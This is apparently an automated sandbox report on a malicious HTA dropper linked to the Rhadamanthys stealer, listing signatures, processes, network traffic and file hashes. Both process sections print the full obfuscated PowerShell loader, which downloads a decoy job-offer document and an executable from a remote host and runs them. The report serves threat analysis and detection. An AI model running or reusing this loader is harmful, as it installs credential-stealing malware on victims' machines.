Malware Analysis Report

2024-11-30 02:34

Sample ID 241101-yrywzasqds
Target Xteam30.hta
SHA256 1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302
Tags
discovery execution rhadamanthys persistence stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1965c93b0ffdb18abb184528e4f9b90a43586cfa8c08a7f5f5bcd8ad8f90a302

Threat Level: Known bad

The file Xteam30.hta was found to be: Known bad.

Malicious Activity Summary

discovery execution rhadamanthys persistence stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Rhadamanthys family

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Adds Run key to start application

Command and Scripting Interpreter: PowerShell

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-01 20:01

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-01 20:01

Reported

2024-11-01 20:04

Platform

win7-20241010-en

Max time kernel

120s

Max time network

121s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Xteam30.hta"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Xteam30.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;

Network

Country Destination Domain Proto
US 8.8.8.8:53 tp2.5ee.mytemp.website udp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp

Files

memory/2592-2-0x0000000002AA0000-0x0000000002AE0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-01 20:01

Reported

2024-11-01 20:04

Platform

win10v2004-20241007-en

Max time kernel

139s

Max time network

143s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Rhadamanthys family

rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 936 created 2624 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\system32\sihost.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GifCamVideoEditor = "C:\\Users\\Admin\\Music\\GifCamUpdater\\GifCamOculus.exe" C:\Users\Admin\AppData\Roaming\Xteam30.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4620 set thread context of 936 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Xteam30.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\openwith.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4892 wrote to memory of 1352 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4892 wrote to memory of 1352 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4892 wrote to memory of 1352 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1352 wrote to memory of 1488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
PID 1352 wrote to memory of 1488 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
PID 1352 wrote to memory of 4620 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 1352 wrote to memory of 4620 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 1352 wrote to memory of 4620 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Xteam30.exe
PID 4620 wrote to memory of 936 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4620 wrote to memory of 936 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4620 wrote to memory of 936 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4620 wrote to memory of 936 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4620 wrote to memory of 936 N/A C:\Users\Admin\AppData\Roaming\Xteam30.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 936 wrote to memory of 4340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 936 wrote to memory of 4340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 936 wrote to memory of 4340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 936 wrote to memory of 4340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe
PID 936 wrote to memory of 4340 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\SysWOW64\openwith.exe

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Xteam30.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function KvGmHPuFs($BcqxEK, $vyAKkT){[IO.File]::WriteAllBytes($BcqxEK, $vyAKkT)};function rfZIzUy($BcqxEK){if($BcqxEK.EndsWith((urRcG @(30019,30073,30081,30081))) -eq $True){Start-Process (urRcG @(30087,30090,30083,30073,30081,30081,30024,30023,30019,30074,30093,30074)) $BcqxEK}else{Start-Process $BcqxEK}};function KcAYN($lUPLD){$wxpeRK = New-Object (urRcG @(30051,30074,30089,30019,30060,30074,30071,30040,30081,30078,30074,30083,30089));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vyAKkT = $wxpeRK.DownloadData($lUPLD);return $vyAKkT};function urRcG($CxcNOM){$UaHeSgZ=29973;$GKoHyynK=$Null;foreach($rNwOIvboe in $CxcNOM){$GKoHyynK+=[char]($rNwOIvboe-$UaHeSgZ)};return $GKoHyynK};function bPsceQMIo(){$nXOFGcK = $env:APPDATA + '\';$zLOPnasH = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30047,30084,30078,30083,30005,30052,30090,30087,30005,30057,30074,30070,30082,30005,30070,30088,30005,30070,30005,30053,30070,30078,30073,30005,30038,30073,30091,30074,30087,30089,30078,30088,30078,30083,30076,30005,30056,30085,30074,30072,30078,30070,30081,30078,30088,30089,30019,30073,30084,30072,30093));$ZiEwaK = $nXOFGcK + 'Join Our Team as a Paid Advertising Specialist.docx';KvGmHPuFs $ZiEwaK $zLOPnasH;rfZIzUy $ZiEwaK;;$KVjfmFmM = KcAYN (urRcG @(30077,30089,30089,30085,30088,30031,30020,30020,30089,30085,30023,30019,30026,30074,30074,30019,30082,30094,30089,30074,30082,30085,30019,30092,30074,30071,30088,30078,30089,30074,30020,30074,30087,30087,30084,30087,30020,30061,30089,30074,30070,30082,30024,30021,30019,30074,30093,30074));$EfTHHfXB = $nXOFGcK + 'Xteam30.exe';KvGmHPuFs $EfTHHfXB $KVjfmFmM;rfZIzUy $EfTHHfXB;;;}bPsceQMIo;

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx" /o ""

C:\Users\Admin\AppData\Roaming\Xteam30.exe

"C:\Users\Admin\AppData\Roaming\Xteam30.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Windows\SysWOW64\openwith.exe

"C:\Windows\system32\openwith.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 134.130.81.91.in-addr.arpa udp
US 8.8.8.8:53 tp2.5ee.mytemp.website udp
SG 118.139.176.218:443 tp2.5ee.mytemp.website tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 218.176.139.118.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.22.249.11:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
GB 2.19.252.143:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 11.249.22.2.in-addr.arpa udp
US 8.8.8.8:53 143.252.19.2.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/1352-0-0x000000007204E000-0x000000007204F000-memory.dmp

memory/1352-1-0x0000000002BA0000-0x0000000002BD6000-memory.dmp

memory/1352-2-0x0000000072040000-0x00000000727F0000-memory.dmp

memory/1352-3-0x00000000056E0000-0x0000000005D08000-memory.dmp

memory/1352-4-0x0000000005610000-0x0000000005632000-memory.dmp

memory/1352-5-0x0000000005D80000-0x0000000005DE6000-memory.dmp

memory/1352-6-0x0000000005EA0000-0x0000000005F06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yu5ixgyf.5in.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1352-16-0x0000000005F10000-0x0000000006264000-memory.dmp

memory/1352-17-0x00000000064D0000-0x00000000064EE000-memory.dmp

memory/1352-18-0x0000000006500000-0x000000000654C000-memory.dmp

memory/1352-19-0x0000000007D10000-0x000000000838A000-memory.dmp

memory/1352-20-0x0000000006A70000-0x0000000006A8A000-memory.dmp

memory/1352-22-0x0000000007A30000-0x0000000007AC6000-memory.dmp

memory/1352-23-0x00000000079C0000-0x00000000079E2000-memory.dmp

memory/1352-24-0x0000000008940000-0x0000000008EE4000-memory.dmp

memory/1488-30-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

memory/1488-29-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

memory/1488-28-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

memory/1488-31-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

memory/1488-32-0x00007FFB72090000-0x00007FFB720A0000-memory.dmp

memory/1488-33-0x00007FFB6FB60000-0x00007FFB6FB70000-memory.dmp

memory/1488-34-0x00007FFB6FB60000-0x00007FFB6FB70000-memory.dmp

C:\Users\Admin\AppData\Roaming\Join Our Team as a Paid Advertising Specialist.docx

MD5 65d4be8afc700f773c79a0d89da13ec5
SHA1 f1bc5b54ee151155e8a85ca61ff1bea7295ee38d
SHA256 2189f8a864e30bf54fc7003c5d63ebfa143c6a07eca060638d30b0a473a97988
SHA512 25244cb6e322c39e7ef8bc1216280730be3927935a315174c1a75110257893f0d6ef41083e5409397396d8974c2fd2caf7003a20ff91de5c6462394d992e3a87

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

MD5 dcc5539b043d7681daaea721f9cc47ab
SHA1 f4a3c4d72ab342e70a28636ef43b986019a3eff0
SHA256 e4f6263f8a8ccfba449dcac191c33905d7eab17d70b615eb4bf030b2d49f0193
SHA512 b4b74954cb0e136c9c6e4f9e89d1d7d86a38351c3499a246a3087882fd3d52b6eee137a8ef2bdc0b75391cda4ff4ebe0422e2c6a8a6cbbfdfc760e1f37750fa5

memory/1352-67-0x000000007204E000-0x000000007204F000-memory.dmp

memory/1352-68-0x0000000072040000-0x00000000727F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Xteam30.exe

MD5 421700a2d6d8516013d87e04628d2802
SHA1 f738ae62f1016c0667115665c42e71d85cfb4d38
SHA256 cc00a259ec4ebde015fe0fad59f369ae23def081caa787ad0652f7d6b2fe6de0
SHA512 c411036515d4046ba62370c2f27e32d414273dc2e4004b9c4396c3518f951ef97c717ab532dd52100f2950e137249462495b376b8d89adde4c3f89292e9f70e6

memory/1352-82-0x0000000072040000-0x00000000727F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 3c33ca687681ba2d1edf5d32d8e22ab0
SHA1 8a50ef40497d260c5a84c7d0c10242d4cd0b5509
SHA256 141748f7ddcd1d6083a041ca770cf9ae3bb4d087cd7033f211b73026e63ad3c9
SHA512 6919d059d8e20f6ee86ad60643f3bc3d6733728839e5c35636359bb724f2d75f13af3bdb17382dc9f7186560f22cbd2abe761eba55e4e4bbfd5d24e11cd360a2

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 d70104b60aaaac0754ccee12bc609da8
SHA1 90ab1ed393002c29ba825450709f27324460cfc2
SHA256 09c64f765129dbbe0562a3df514a34c4c2ce363f0fb31e4e51e7572f45e7ce7b
SHA512 72c7c65e24e310b74b723a45662629c92532b12ccaede11c63730bc528ea414e31e42e71ac1378b0d3a3f485880b320a6eff188f3bc48518a37ce7701b29246f

memory/4620-98-0x0000000000400000-0x0000000000887000-memory.dmp

memory/4620-144-0x0000000000400000-0x0000000000887000-memory.dmp

memory/4620-147-0x0000000000400000-0x0000000000887000-memory.dmp

memory/4620-145-0x0000000000400000-0x0000000000887000-memory.dmp

memory/4620-146-0x0000000000400000-0x0000000000887000-memory.dmp

memory/936-148-0x00000000000D0000-0x0000000000180000-memory.dmp

memory/4620-150-0x0000000000400000-0x0000000000887000-memory.dmp

memory/4620-149-0x0000000000400000-0x0000000000887000-memory.dmp

memory/936-151-0x0000000004F40000-0x0000000004FD2000-memory.dmp

memory/936-188-0x0000000000AD0000-0x0000000000AD8000-memory.dmp

memory/936-189-0x0000000000AE0000-0x0000000000AF0000-memory.dmp

memory/936-190-0x00000000054A0000-0x00000000058A0000-memory.dmp

memory/936-191-0x00000000054A0000-0x00000000058A0000-memory.dmp

memory/936-192-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

memory/936-194-0x0000000076600000-0x0000000076815000-memory.dmp

memory/4340-195-0x0000000001100000-0x0000000001109000-memory.dmp

memory/4340-198-0x0000000002D20000-0x0000000003120000-memory.dmp

memory/4340-202-0x00007FFBB2010000-0x00007FFBB2205000-memory.dmp

memory/4340-210-0x0000000076600000-0x0000000076815000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDFCE4.tmp\gb.xsl

MD5 51d32ee5bc7ab811041f799652d26e04
SHA1 412193006aa3ef19e0a57e16acf86b830993024a
SHA256 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA512 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810